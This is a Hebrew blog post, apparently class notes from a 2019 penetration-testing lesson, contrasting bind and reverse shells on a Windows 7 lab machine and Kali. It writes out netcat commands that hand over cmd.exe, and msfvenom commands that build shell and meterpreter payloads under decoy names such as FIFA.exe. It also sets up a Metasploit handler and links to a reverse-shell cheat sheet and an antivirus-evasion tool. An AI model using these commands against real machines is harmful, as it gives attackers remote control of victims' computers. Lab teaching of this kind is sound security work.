R

© 2019 maestro

  • אלי רובין

REVERSE SHELLל BIND SHELL מה ההבדל בין

עודכן ב: 23 נוב 2019












Bind Shell VS Reverse Shell

בשיטת Bind משתמש א כביכול מבקש עזרה ממשתמש ב ולכן פותח עבורו אפשרות גישה לתוך המחשב שלו.

בשיטת Reverse משתמש ב פותח האזנה אצלו במחשב, ואז משתמש א מתחבר לאותה האזנה ובאותו הזמן בעצם מגיש/שולח את הגישה מהמחשב שלו למשתמש ב.

במסמך הזה משתמש א הוא כביכול ה Win7 ומשתמש ב הוא Kali.

השתמשנו בכיתה בכלי nc כדי ליצור את שתי שיטות ה Shell בין המשתמשים.

בשיטת Bind ביצענו את הפקודות הבאות:

משתמש א מריץ - nc.exe -nvlp 555 -e cmd.exe

משתמש ב מריץ - nc 192.168.1.10 555

בשיטת ה Reverse ביצענו את הפקודות הבאות:

משתמש ב מריץ - nc -nvlp 4545

משתמש א מריץ - nc 192.168.1.12 4545 -e cmd.exe

השתמשנו גם ב msfvenum כדי ליצור תוכנה זדונית קטנה שתפקידה הוא לבצע Bind וכמובן גם Reverse Shell, השתמשנו בפקודות הבאות:

כדי ליצור Bind נריץ - msfvenom -p windows/shell_bind_tcp rhost=192.168.1.7 lport=8787 -f exe -o /root/FIFA.exe

כדי ליצור Reverse נריץ - msfvenom -p windows/shell_reverse_tcp lhost=192.168.1.11 lport=443 -f exe -o /root/Pool.exe

השתמשנו גם ב msfvenum כדי ליצור meterpreter shell, השתמשנו בפקודה הבאה:

כדי ליצור Reverse נריץ - msfvenom -p windows/meterpreter/reverse_tcp LHOST=192.168.1.11 LPORT=50 -f exe > reverse.exe

כדי לפתוח האזנה ב metasploit הרצנו את הפקודות הבאות:

דבר ראשון - msfconsole

דבר שני - use exploit/multi/handler

אחר כך - set payload windows/meterpreter/reverse_tcp

ואז - set lhost 192.168.1.11

כמובן גם - set lport 50

ולבסוף - run

פקודות נוספות ולינקים שהשתמשנו בהם במהלך השיעור:

א) locate nc.exe

ב) python -m SimpleHTTPServer 80

ד) xdg-open

ו) ncat

ז) http://pentestmonkey.net/cheat-sheet/shells/reverse-shell-cheat-sheet

ח) המלצה שלי לנסות ולהשתמש בכלי הזה - https://tools.kali.org/maintaining-access/shellter


ליצירת קשר ושירות טכנאי מחשבים בירושלים עד הבית חייגו – 0532104457

8 צפיות